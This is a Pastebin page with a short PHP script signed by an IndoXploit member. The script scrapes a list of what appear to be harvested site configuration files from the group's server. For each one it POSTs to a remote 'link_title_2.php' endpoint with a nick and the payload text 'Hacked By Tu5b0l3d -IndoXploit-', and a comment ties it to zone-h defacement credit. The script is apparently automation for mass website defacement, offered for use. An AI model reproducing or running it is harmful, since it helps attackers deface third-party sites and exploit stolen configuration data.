Advertisement
Tu5b0l3d

link_index.php

Apr 14th, 2016
1,360
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
PHP 1.06 KB | None | 0 0
  1. <?php
  2. // Tu5b0l3d -IndoXploit-
  3. // link_title_2.php
  4.  
  5. error_reporting(0);
  6. $link = "http://indoxploit.or.id/configs/"; // link configs
  7. $get_link = file_get_contents($link);
  8.  
  9. preg_match_all("/<li><a href=\"(.*?)\">/", $get_link, $configs);
  10. $path = $configs[1][0];
  11.  
  12. foreach($configs[1] as $config){
  13.     if($config != $path){
  14.     $sites .= "$link$config\n";
  15. }  
  16. }
  17. $links = explode("\n", $sites);
  18.         foreach($links as $link){
  19.         echo "$link\n";
  20.  
  21. $ch8 = curl_init ("http://indoxploit.or.id/index.php/link_title_2.php"); // link_title_2.php
  22.                         curl_setopt ($ch8, CURLOPT_RETURNTRANSFER, 1);
  23.                         curl_setopt ($ch8, CURLOPT_POST, 1);
  24.                         curl_setopt ($ch8, CURLOPT_POSTFIELDS, "nick=ID-IM&link=$link&script=Hacked By Tu5b0l3d -IndoXploit-"); // change Nick for zone-h, script (must hacked)
  25.                         curl_setopt($ch8, CURLOPT_RETURNTRANSFER, 1);
  26.                         curl_setopt($ch8, CURLOPT_COOKIEFILE,"coker_log");
  27.                         $ps = curl_exec($ch8);  
  28.  
  29. echo $ps;
  30.             }
  31. ?>
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement